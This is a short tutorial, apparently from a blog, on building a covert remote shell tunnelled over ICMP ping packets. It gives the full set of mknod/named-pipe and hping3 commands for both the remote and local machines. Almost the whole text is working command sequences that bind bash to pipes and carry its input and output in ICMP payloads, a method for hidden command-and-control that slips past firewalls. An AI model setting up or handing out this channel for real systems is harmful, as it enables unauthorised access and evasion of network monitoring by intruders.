Setup a Remote Shell over ICMP (ping)

There may be a tighter way to accomplish this, but these are the basic steps for setting up a remote shell over ICMP.


First, on the remote system we setup some named pipes, and attach them to the STDIN and STDOUT (we also direct STDERR to STDIN) of a shell:

mknod /tmp/in p # depending on your system you may have to use mkfifo
mknod /tmp/out p
bash </tmp/in >/tmp/out 2>&1


Next step, direct STDOUT of a listening hping to the "in" pipe on the remote system, followed by an outgoing hping reading from the "out" pipe.

hping3 [LOCAL_BOX_IP] --listen MSGIDIN -I eth0 --icmp > /tmp/in &
hping3 [LOCAL_BOX_IP] --sign MSGIDOUT -I eth0 --icmp -d 1200 --file /tmp/out &


Now we move to the local system, setting up a listening hping to receive the output from the remote box. Followed by making another named pipe for an outgoing hping to read, which we'll use to send commands to the remote system:

hping3 [REMOTE_BOX_IP] --listen MSGIDOUT -I eth0 --icmp &
mknod /tmp/out p
hping3 [REMOTE_BOX_IP] --sign MSGIDIN -I eth0 --icmp -d 1200 --file /tmp/out &


Now all you have to do is send command to the named type on the local system, don't worry about the lack of prompt:

cat > /tmp/out

Tada! It's a little messy, you might end up with some duplicated output — but it works.